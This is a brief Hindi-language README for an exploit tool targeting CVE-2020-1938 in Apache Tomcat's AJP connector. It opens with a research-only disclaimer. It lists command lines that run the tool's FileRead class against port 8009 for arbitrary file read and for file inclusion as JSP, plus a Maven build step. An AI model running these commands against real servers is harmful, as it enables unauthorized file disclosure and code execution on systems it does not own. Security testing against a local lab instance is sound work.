
CVE-2020-1938
यह उपकरण केवल सुरक्षा अनुसंधान और आंतरिक जांच के लिए है। अवैध हमलों के लिए इस उपकरण का उपयोग निषिद्ध है, और परिणामों की जिम्मेदारी उपयोगकर्ता की होगी।

apache-tomcat-8.5.32.zip परीक्षण टॉमकैट
मनमाना फ़ाइल पढ़ना
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
फ़ाइल समावेशन
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
पैकेजिंग विधि: निर्देशिका tomcat/ajp-bug में निष्पादित करें mvn clean compile assembly:assembly